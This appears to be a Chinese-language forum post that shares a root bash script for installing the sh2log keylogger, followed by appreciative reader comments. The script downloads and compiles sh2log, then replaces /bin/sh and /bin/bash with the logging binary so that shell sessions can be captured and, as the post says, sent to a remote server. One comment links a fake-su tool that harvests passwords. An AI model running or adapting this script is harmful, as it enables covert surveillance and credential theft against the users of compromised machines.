自动安装sh2log键盘记录的脚本
关于sh2log参考 http://fuzzexp.org/linuxsh2log_keylogger.html
其实sh2log是可以设置成发送到远端的服务器,实时监控键盘记录。具体可以参考源码中readme:
#!/bin/bash
##
#from tools.net
#run the script as root
echo "installing sh2log "
dlurl='http://packetstorm.foofus.com/UNIX/loggers/sh2log-1.0.tgz'
echo "Fetching from"$dlurl
wget $dlurl
tar zxf sh2log-1.0.tgz
cd sh2log-1.0
DIS=`head /etc/issue -n 1|awk '{print $1}'`
if [ $DIS = "CentOS" ];then
yum install -y libX11-devel
elif [ $DIS = "Ubuntu" ] ; then
apt-get install libx11-dev
fi
make linux
mkdir /bin/shells/
cp -p /bin/sh /bin/shells/
cp -p /bin/bash /bin/shells/
rm -rf /bin/sh /bin/bash
cp -p sh2log /bin/sh
cp -p sh2log /bin/bash
./sh2logd自动化才是方向。
关于作者
评论15次
好东西,受教了
这个东西有windows的吗?
测试 要权限?
好东西 。。。 研究下
linux就是却工具啊.gif)
很不错的 东西感谢lz 分享
不错。测试下。
不错。测试下。
好东西,受教了
linux 安装软件包视乎 包管理器 (package managers) (( ubuntu/debian 是 apt, archlinux 是pacman…… 牵涉到软件安装,修改xi统配置都要 root 权限的。 但是如果你没有 root 权限的话,很多东西都不能实现,例如 sh2log 的bash 实时发送封包,那些都是拥有 root 权限之后的事。
感谢分享的脚本。我懂你的意思了。键盘记录的目的不单单是获取一个密码。sh2log可以将bash输出实时的发送到远端服务器。可以很好的监控和分析用户行为。
好吧。这是一个问题么。。。linux不需要root权限就可以安装软件包么。求指点。
这个比较靠谱点,至少是以 user 权限。假借 su 命令输入密码错误的环境来取得密码。 [github] https://github.com/Zypeh/fakesu/tree/master/fakesu.recorder #所以说还是安装 sudo 包比较安全,su 的安全性不太强啊 :-/
关键是,此 bash 脚本必须以 root 权限运行
http://packetstorm.foofus.com/UNIX/loggers/sh2log-1.0.tgz